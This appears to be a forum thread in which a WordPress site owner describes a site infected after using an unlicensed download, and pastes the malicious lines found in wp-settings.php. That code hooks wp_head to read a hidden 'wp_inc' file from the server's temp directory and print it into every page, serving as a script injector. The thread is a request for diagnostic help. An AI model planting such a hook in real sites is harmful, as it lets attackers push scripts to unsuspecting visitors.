kastnercreative

Should be fixed now, thanks for your help and I’m glad I could support you for your work!

Ah yikes – I had no idea! That explains why it’s not functioning then! Not really too sure where I downloaded it from either, but will definitely sort out a licence now.

https://stuffingmyface.com/register/ or https://stuffingmyface.com/login/

(ignore the styling, not quite done with that side of things)

Weird, I cleaned the code out of my wp-settings.php yesterday and that fixed it.

However I can’t find the wp_inc file or folder in the tmp folder on the server… weird, I wonder maybe if it’s been cleaned up by my hosting providers’ virus scanning… odd.

Yeah same thing has happened to me… can’t really find where the malicious code is coming from – pulling my hair out right now.

The only file that has changed on the entire site in the last 24 hours is wp-settings.php and I can’t see anything unusual in there…

Update: Ok, well I replaced my wp-settings.php with an older version I had from about a month ago and it seems to have removed the malicious script tag that was being appended to the page headers….

This seems to be the only lines of code that were different…?? Anyone able to decypher what this function is doing?

303 function check_wordpress(){
304	$t_d = sys_get_temp_dir();
305	if(file_exists($t_d . '/wp_inc')){
306	readfile($t_d . '/wp_inc');
307	}
308	}
309	add_action('wp_head', 'check_wordpress');
310
311	do_action( 'init' );